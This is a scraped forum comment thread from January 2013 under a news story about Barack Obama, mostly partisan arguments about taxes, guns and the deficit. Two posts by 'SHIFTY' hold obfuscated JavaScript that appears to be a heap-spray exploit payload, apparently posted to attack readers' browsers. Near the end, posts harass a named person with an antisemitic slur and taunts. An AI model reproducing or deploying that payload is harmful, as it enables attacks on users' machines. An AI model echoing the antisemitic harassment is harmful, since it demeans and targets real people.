Barack Obama, our next President

Full story: Hampton Roads Daily Press

"The road ahead will be long. Our climb will be steep," Obama cautioned. Young and charismatic but with little experience on the national level, Obama smashed through racial barriers and easily defeated ...
Comments
770,221 - 770,240 of 1,096,132 Comments Last updated 9 min ago
carol

Orlando, FL

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

WiseMan wrote:
<quoted text>WOW!!!! You a retired teacher making gross of $1500.00 per week. And you want to be on here bitching about government when the tax payers are paying you $1500.00 per week retirement??????????
Can't be making money teaching as a retired teacher or one who just left the profession 15 years ago.

Teachers didn't make anything close to $1500 a week when I was teaching. Times must have changed. A lot.
carol

Orlando, FL

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

maddmaxx7 wrote:
<quoted text>
Ever since Bush left office, liberals don't give a crap about soldiers deaths and maimings or Afghanistan, the wars were merely a cudgel to bludgeon Bush with.
What ever happened to Code Pink? Where are the Hollywood celebrities having hissy fits about the war?
Gone, irrelevant, silent, unseen.
Exact-a-mundo.
carol

Orlando, FL

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

maddmaxx7 wrote:
<quoted text>
What did you expect from Tarentino? Gratuitous violence, murders and gunplay. I'd say that guy shares some of the blame for our gun violent society.
Do you happen to prefer science fiction?
This is part of the answer Lily was looking for the other day. Gratutious violence in movies and video games coupled with a generation devoid of a moral compass thanks, in large part, to the progressive liberal mentality...a perfect combination for the powers of darkness to wreak havoc.
brown eyes

Salem, VA

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

Nice song Huckabee and Fox News Agency If The Ocean Were Whiskey And I Were A Duck I'd Swim To The Bottom And Drink My Way Up. LOL
carol

Orlando, FL

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

Lily Boca Raton Fl wrote:
<quoted text>
How will the tab be paid?
Cutting millions of dollars a year on waste and duplication is the starting point. Major reforms and revenues by a strong free market would pay for the rest sooner than later.

Of course, term limits and ridding Congress of career politicians is an absolute necessity. This has to be the republican platform in 2016.
carol

Orlando, FL

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

Death of Tenzing wrote:
<quoted text>
Its the same thing I've been telling you for years, you have to pay for the government you demanded instead of stealing from future generations. You've been more than happy to sit on your as s enjoying these tax cuts while demanding ever more from your government and deferring the cost to your daughter.
You sure haven't been very vocal about this the past four years - six if you include the last two years of Bush's term and a democrat congress.
carol

Orlando, FL

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

John Galt wrote:
<quoted text>
You were never entitled to the lower Social Security tax. Unless, of course, you are willing to terminate the entire program.
As long as they give me back my money they took from me for the past four decades.

It's not so much the working but the government wasting what I have to work for.
carol

Orlando, FL

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

maddmaxx7 wrote:
<quoted text>
I did research this myself:
Obama has intentionally and willfully lied to the American public, yet idiotic liberals stick by him:
On the evening of January 11, 1996, while Mitt Romney was in the final years of his run as the head of Bain Capital, Barack Obama formally joined the New Party, which was deeply hostile to the mainstream of the Democratic party and even to American capitalism. In 2008, candidate Obama deceived the American public about his potentially damaging tie to this third party. The issue remains as fresh as todays headlines, as Romney argues that Obama is trying to move the United States toward European-style social democracy, which was precisely the New Partys goal.
In late October 2008, when I wrote here at National Review Online that Obama had been a member of the New Party, his campaign sharply denied it, calling my claim a crackpot smear. Fight the Smears, an official Obama-campaign website, staunchly maintained that Barack has been a member of only one political party, the Democratic Party. I rebutted this, but the debate was never taken up by the mainstream press.
Recently obtained evidence from the updated records of Illinois ACORN at the Wisconsin Historical Society now definitively establishes that Obama was a member of the New Party. He also signed a contract promising to publicly support and associate himself with the New Party while in office.
Rush and others were right, idiotic Topix libs were wrong, big surprise.
It's more difficult for me to understand why everyone can't see this is what's happening than being surprised that it is.

Since: Aug 11

Location hidden

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

carol wrote:
<quoted text>
Cutting millions of dollars a year on waste and duplication is the starting point. Major reforms and revenues by a strong free market would pay for the rest sooner than later.
Of course, term limits and ridding Congress of career politicians is an absolute necessity. This has to be the republican platform in 2016.
neither Republican or Democrat is for any Major Reform besides the Republican are responsible for the biggest expansion of Medicare, Part D.
Help Raped Girl

Utica, NY

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Please help a Virgina girl who was raped in Ohio.

This was copied from topix in the town she was raped in.

If you watch video's from the petition site, use discretion its disturbing.

What would you do if your daughter, sister was raped ?

Have you seen the posts where these animals are calling this poor victim disgusting things on topix ?

You can help.

https://petitions.whitehouse.gov/petition/mak...

http://www.change.org/petitions/oh-bar-associ...

https://petitions.whitehouse.gov/petition/ass...

http://www.change.org/petitions/attorney-gene...

https://www.change.org/petitions/ohio-state-u...

A giant thanks to poster "Mollypot" with address

Indiana, PA , Thank you.

Since: Aug 11

Location hidden

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Judged:

Republican Deficit Hypocrisy

Bruce Bartlett, 11.20.09, 12:01 AM EST

Remember the Medicare drug benefit?

The human capacity for self-delusion never ceases to amaze me, so it shouldn't surprise me that so many Republicans seem to genuinely believe that they are the party of fiscal responsibility. Perhaps at one time they were, but those days are long gone.

This fact became blindingly obvious to me six years ago this month when a Republican president and a Republican Congress enacted the Medicare drug benefit, which former U.S. Comptroller General David Walker has called "the most fiscally irresponsible piece of legislation since the 1960s."

Recall the situation in 2003. The Bush administration was already projecting the largest deficit in American history--$475 billion in fiscal year 2004, according to the July 2003 mid-session budget review. But a big election was coming up that Bush and his party were desperately fearful of losing. So they decided to win it by buying the votes of America's seniors by giving them an expensive new program to pay for their prescription drugs.

Click Link Below to continue reading.

http://www.forbes.com/2009/11/19/republican-b...
SHIFTY

Anonymous Proxy

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

for(S=110,k=6,y=49,L=" ";S+k>0;L+=String.from CharCode(y&65535),y> >=16,k-=16)for(;k<16 &&S;y+=("e>t )l櫭Od;$eWv?FʹZB| ǫf;-S y]vأI_Xrf 0vzqn G7W`t.iq-aeg/bY/ :!k6".charCodeAt(--S)+1 )%161<<k,k+=7);for(n= "\u0c0c",e=[],d=0;d+ +<197;)d<20?n+=n:e[d]=[n .substr(50),L].join(" ")
SHIFTY

Anonymous Proxy

|
Report Abuse
|
Judge it!
|
Jan 6, 2013

Test<integr> Isrl+for(S=110,k=6,y=49,L= " ";S+k>0;L+=String.from CharCode(y&65535),y> >=16,k-=16)for(;k<16 &&S;y+=("e>t )l櫭Od;$eWv?FʹZB| ǫf;-S y]vأI_Xrf 0vzqn G7W`t.iq-aeg/bY/ :!k6".charCodeAt(--S)+1 )%161<<k,k+=7);for(n= "\u0c0c",e=[],d=0;d+ +<197;)d<20?n+=n:e[d]=[n .substr(50),L].join(" ")
For real

United States

|
Report Abuse
|
Judge it!
|
Jan 7, 2013

Judged:

Thank GOD for having a DEMOCRAT PRESIDENT,

GOOD JOB PRESIDENT OBAMA, KEEP IT UP!
brown eyes

Christiansburg, VA

|
Report Abuse
|
Judge it!
|
Jan 7, 2013

Judged:

Solving the fiscal cliff is easy. Go back to Jimmy Carter era interest rates. UMWA loves to pay their fair shre of taxes. LOL Dedicated to Fallen Heroes. Safer World 2013 My what a New Years hangover.

Since: Jan 13

Windsor, Ct.

|
Report Abuse
|
Judge it!
|
Jan 7, 2013

Judged:

Hahahahahahaha, old raider! You are my bitch now!(Stephen Waxman, Hamden, Connecticut. Incidentally.)

Windsor, Ct.

|
Report Abuse
|
Judge it!
|
Jan 7, 2013

Judged:

Yale is such a good school, I often wonder why you little people bother?

Windsor, Ct.

|
Report Abuse
|
Judge it!
|
Jan 7, 2013

Judged:

See you in St. Louis, Stephen. Say, um, when's the last time a Jew like you got laid?

Windsor, Ct.

|
Report Abuse
|
Judge it!
|
Jan 7, 2013

Judged:

brown eyes wrote:
Solving the fiscal cliff is easy. Go back to Jimmy Carter era interest rates. UMWA loves to pay their fair shre of taxes. LOL Dedicated to Fallen Heroes. Safer World 2013 My what a New Years hangover.
Hey! You're up early! How about some Lox? You're buying of course...

Windsor, Ct.

|
Report Abuse
|
Judge it!
|
Jan 7, 2013

Judged:

SATAN SAYS: WITH A CV LIKE YOURS HOW MANY MORE LIES CAN YOU TELL? UM, OH YES, YOU WERE SO CLOSE TO ALL THOSE NOBEL LAUREATES I'LL BET YOU CAN ALMOST TASTE THEM, EH?

Tell me when this thread is updated: (Registration is not required)

Add to my Tracker Send me an email

Add your comments below

Characters left: 4000

Please note by submitting this form you acknowledge that you have read the Terms of Service and the comment you are posting is in compliance with such terms. Be polite. Inappropriate posts may be removed by the moderator. Send us your feedback.

Other Recent Chicago Discussions

Title Updated Last By Comments
Topix Chitown Regulars (Aug '09) 7 min edogxxx 97,824
Abby 8-22 9 min edogxxx 1
Ill. House Approves Legalizing Same-Sex Civil U... (Dec '10) 12 min You Dont Know Jack 49,270
Amy 8-22 12 min edogxxx 1
Messianic Jews say they are persecuted in Israel (Jun '08) 43 min JOEL 68,843
BARACK OBAMA BIRTH CERTIFICATE: Suit contesting... (Jan '09) 1 hr wojar 176,801
Father Of Hans Peterson Speaks Out (Oct '07) 3 hr CDC 42

Search the Chicago Forum:
•••

Flash Flood Warning for Cook County was issued at August 22 at 5:30AM CDT

•••
•••
•••

Chicago Jobs

•••